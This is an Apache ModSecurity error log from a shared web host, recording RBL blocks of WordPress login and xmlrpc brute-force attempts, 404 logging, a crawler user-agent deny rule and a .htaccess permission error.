[Tue May 26 13:57:59.093415 2026] [security2:error] [pid 555743:tid 555877] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZjsjqAquC0YaxQjDKEAAAAQ4"]
[Tue May 26 13:58:00.696716 2026] [security2:error] [pid 560287:tid 560457] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZkJmX5s6sDS3wJVcuPQAAAKo"]
[Tue May 26 13:58:01.781431 2026] [security2:error] [pid 560287:tid 560447] [client 129.222.147.134:44895] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZkZmX5s6sDS3wJVcuUQAAAKE"]
[Tue May 26 13:58:01.781595 2026] [security2:error] [pid 560287:tid 560447] [client 129.222.147.134:44895] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZkZmX5s6sDS3wJVcuUQAAAKE"]
[Tue May 26 13:58:02.465203 2026] [security2:error] [pid 555743:tid 555893] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZksjqAquC0YaxQjDKNwAAAR4"]
[Tue May 26 13:58:04.318774 2026] [security2:error] [pid 555743:tid 555966] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZk8jqAquC0YaxQjDKTwAAAWc"]
[Tue May 26 13:58:04.479647 2026] [security2:error] [pid 560287:tid 560540] [client 146.174.187.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZlJmX5s6sDS3wJVcuaQAAAPg"]
[Tue May 26 13:58:05.968930 2026] [security2:error] [pid 560287:tid 560492] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZlZmX5s6sDS3wJVcufgAAAMs"]
[Tue May 26 13:58:07.250600 2026] [security2:error] [pid 555743:tid 555931] [client 202.141.30.10:35433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZl8jqAquC0YaxQjDKbwAAAUQ"]
[Tue May 26 13:58:07.250700 2026] [security2:error] [pid 555743:tid 555931] [client 202.141.30.10:35433] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZl8jqAquC0YaxQjDKbwAAAUQ"]
[Tue May 26 13:58:08.249217 2026] [security2:error] [pid 560287:tid 560540] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZl5mX5s6sDS3wJVcuqgAAAPg"]
[Tue May 26 13:58:09.312584 2026] [security2:error] [pid 560287:tid 560433] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZmJmX5s6sDS3wJVcuvQAAAJQ"]
[Tue May 26 13:58:11.219310 2026] [security2:error] [pid 560287:tid 560529] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZmpmX5s6sDS3wJVcu2AAAAO8"]
[Tue May 26 13:58:12.215926 2026] [security2:error] [pid 560287:tid 560484] [client 129.222.147.134:48854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZnJmX5s6sDS3wJVcu8QAAAMM"]
[Tue May 26 13:58:12.216088 2026] [security2:error] [pid 560287:tid 560484] [client 129.222.147.134:48854] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZnJmX5s6sDS3wJVcu8QAAAMM"]
[Tue May 26 13:58:12.763736 2026] [security2:error] [pid 560287:tid 560435] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZnJmX5s6sDS3wJVcu9QAAAJY"]
[Tue May 26 13:58:14.544908 2026] [security2:error] [pid 560287:tid 560518] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZnpmX5s6sDS3wJVcvGQAAAOQ"]
[Tue May 26 13:58:16.318314 2026] [security2:error] [pid 555743:tid 555926] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZn8jqAquC0YaxQjDKxwAAAT8"]
[Tue May 26 13:58:16.678338 2026] [security2:error] [pid 560287:tid 560325] [remote 195.250.23.247:46960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVZoJmX5s6sDS3wJVcvPQAAtyU"]
[Tue May 26 13:58:18.186868 2026] [security2:error] [pid 555743:tid 555966] [client 202.141.30.10:35414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZosjqAquC0YaxQjDK3gAAAWc"]
[Tue May 26 13:58:18.187465 2026] [security2:error] [pid 555743:tid 555966] [client 202.141.30.10:35414] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZosjqAquC0YaxQjDK3gAAAWc"]
[Tue May 26 13:58:18.671537 2026] [security2:error] [pid 555743:tid 555969] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZosjqAquC0YaxQjDK4QAAAWo"]
[Tue May 26 13:58:19.737569 2026] [security2:error] [pid 560287:tid 560345] [remote 51.91.98.45:54486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVZo5mX5s6sDS3wJVcvZwAAmzk"]
[Tue May 26 13:58:19.764827 2026] [security2:error] [pid 560287:tid 560545] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZo5mX5s6sDS3wJVcvZgAAAP0"]
[Tue May 26 13:58:21.072232 2026] [security2:error] [pid 560287:tid 560535] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZpJmX5s6sDS3wJVcvcAAAAPU"]
[Tue May 26 13:58:22.355301 2026] [security2:error] [pid 555743:tid 555888] [client 129.222.147.134:44544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZpsjqAquC0YaxQjDK_AAAARk"]
[Tue May 26 13:58:22.363137 2026] [security2:error] [pid 555743:tid 555888] [client 129.222.147.134:44544] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZpsjqAquC0YaxQjDK_AAAARk"]
[Tue May 26 13:58:23.262818 2026] [security2:error] [pid 555743:tid 555893] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZpsjqAquC0YaxQjDLAwAAAR4"]
[Tue May 26 13:58:23.498917 2026] [security2:error] [pid 555743:tid 555937] [client 106.192.248.115:62546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZp8jqAquC0YaxQjDLBgAAAUo"]
[Tue May 26 13:58:23.499044 2026] [security2:error] [pid 555743:tid 555937] [client 106.192.248.115:62546] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZp8jqAquC0YaxQjDLBgAAAUo"]
[Tue May 26 13:58:24.636890 2026] [security2:error] [pid 555743:tid 555817] [remote 45.79.189.31:54262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVZqMjqAquC0YaxQjDLEQABekk"]
[Tue May 26 13:58:24.843800 2026] [security2:error] [pid 555743:tid 555898] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZqMjqAquC0YaxQjDLEAAAASM"]
[Tue May 26 13:58:26.115606 2026] [security2:error] [pid 560287:tid 560377] [remote 47.128.46.66:45264] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/"] [unique_id "ahVZqpmX5s6sDS3wJVcvowAAjVg"]
[Tue May 26 13:58:26.199790 2026] [security2:error] [pid 555743:tid 555858] [remote 94.76.235.103:33464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVZqsjqAquC0YaxQjDLHQABTHI"]
[Tue May 26 13:58:26.720817 2026] [security2:error] [pid 560287:tid 560421] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZqpmX5s6sDS3wJVcvrAAAAIg"]
[Tue May 26 13:58:27.612262 2026] [security2:error] [pid 555743:tid 555930] [client 14.174.55.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZq8jqAquC0YaxQjDLKAAAAUM"]
[Tue May 26 13:58:28.396583 2026] [security2:error] [pid 555743:tid 555948] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZrMjqAquC0YaxQjDLNgAAAVU"]
[Tue May 26 13:58:28.950485 2026] [security2:error] [pid 555743:tid 555888] [client 172.226.42.184:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVZrMjqAquC0YaxQjDLQwAAARk"]
[Tue May 26 13:58:29.126698 2026] [security2:error] [pid 560287:tid 560490] [client 202.141.30.10:35540] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZrJmX5s6sDS3wJVcv1AAAAMk"]
[Tue May 26 13:58:29.126889 2026] [security2:error] [pid 560287:tid 560490] [client 202.141.30.10:35540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVZrJmX5s6sDS3wJVcv1AAAAMk"]
[Tue May 26 13:58:29.165214 2026] [security2:error] [pid 560287:tid 560446] [client 106.192.248.115:63033] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZrZmX5s6sDS3wJVcv2QAAAKA"]
[Tue May 26 13:58:29.167022 2026] [security2:error] [pid 560287:tid 560446] [client 106.192.248.115:63033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZrZmX5s6sDS3wJVcv2QAAAKA"]
[Tue May 26 13:58:30.314148 2026] [security2:error] [pid 560287:tid 560483] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZrZmX5s6sDS3wJVcv4wAAAMI"]
[Tue May 26 13:58:31.454915 2026] [security2:error] [pid 560287:tid 560359] [remote 178.156.182.155:40914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVZr5mX5s6sDS3wJVcv9wAAjEY"]
[Tue May 26 13:58:32.046083 2026] [security2:error] [pid 560287:tid 560476] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZr5mX5s6sDS3wJVcv_gAAALw"]
[Tue May 26 13:58:32.533120 2026] [security2:error] [pid 560287:tid 560445] [client 129.222.147.134:22724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZsJmX5s6sDS3wJVcwBgAAAJ8"]
[Tue May 26 13:58:32.540919 2026] [security2:error] [pid 560287:tid 560445] [client 129.222.147.134:22724] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVZsJmX5s6sDS3wJVcwBgAAAJ8"]
[Tue May 26 13:58:33.628856 2026] [security2:error] [pid 560287:tid 560436] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZsZmX5s6sDS3wJVcwDQAAAJc"]
[Tue May 26 13:58:33.935490 2026] [security2:error] [pid 560287:tid 560456] [client 66.249.64.110:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVZsZmX5s6sDS3wJVcwGQAAAKk"]
[Tue May 26 13:58:33.935998 2026] [security2:error] [pid 560287:tid 560516] [client 66.249.64.110:53624] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVZsZmX5s6sDS3wJVcwFgAAAOI"]
[Tue May 26 13:58:34.418621 2026] [security2:error] [pid 560287:tid 560378] [remote 74.7.241.58:47106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVZspmX5s6sDS3wJVcwIAAA5Fk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/ja
[Tue May 26 13:58:34.478601 2026] [security2:error] [pid 555743:tid 555806] [remote 82.196.25.136:48152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVZssjqAquC0YaxQjDLbAABQz4"]
[Tue May 26 13:58:35.343558 2026] [security2:error] [pid 560287:tid 560454] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZspmX5s6sDS3wJVcwKQAAAKc"]
[Tue May 26 13:58:36.461289 2026] [security2:error] [pid 560287:tid 560367] [remote 141.95.202.18:42380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVZtJmX5s6sDS3wJVcwNwAA304"]
[Tue May 26 13:58:37.216725 2026] [security2:error] [pid 560287:tid 560495] [client 62.60.130.233:53763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.test.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahVZtZmX5s6sDS3wJVcwQwAAAM4"], referer: https://www.facebook.com/
[Tue May 26 13:58:37.251301 2026] [security2:error] [pid 560287:tid 560493] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZtJmX5s6sDS3wJVcwPwAAAMw"]
[Tue May 26 13:58:37.562307 2026] [security2:error] [pid 560287:tid 560437] [client 62.60.130.233:50951] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.test.glorodrc.com"] [uri "/wp-login.php"] [unique_id "ahVZtZmX5s6sDS3wJVcwSgAAAJg"]
[Tue May 26 13:58:38.746580 2026] [security2:error] [pid 560287:tid 560551] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVZtpmX5s6sDS3wJVcwWgAAAQM"]
[Tue May 26 13:58:39.091729 2026] [security2:error] [pid 555743:tid 555953] [client 47.128.17.114:32140] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahVZt8jqAquC0YaxQjDLjAAAAVo"]
[Tue May 26 13:58:39.179616 2026] [security2:error] [pid 560287:tid 560535] [client 106.192.248.115:63397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZt5mX5s6sDS3wJVcwaQAAAPU"]
[Tue May 26 13:58:39.184307 2026] [security2:error] [pid 560287:tid 560535] [client 106.192.248.115:63397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVZt5mX5s6sDS3wJVcwaQAAAPU"]
[Tue May 26 13:58:39.207816 2026] [core:crit] [pid 560287:tid 560477] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:58:40.075575 2026] [security2:error] [pid 555743:tid 555909] [client 208.91.198.85:45060] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVZt8jqAquC0YaxQjDLkgAAAS4"], referer: https://www.bloggertarget.com
[Tue May 26 13:58:40.253418 2026] [security2:error] [pid 560287:tid 560538] [client 208.91.198.85:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVZuJmX5s6sDS3wJVcwgQAAAPY"], referer: https://www.bloggertarget.com
[Tue May 26 13:58:40.624704 2026] [security2:error] [pid 560287:tid 560509] [client 147.53.121.153:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVZuJmX5s6sDS3wJVcwlwAAANs"], referer: https://www.anujtradingco.com/
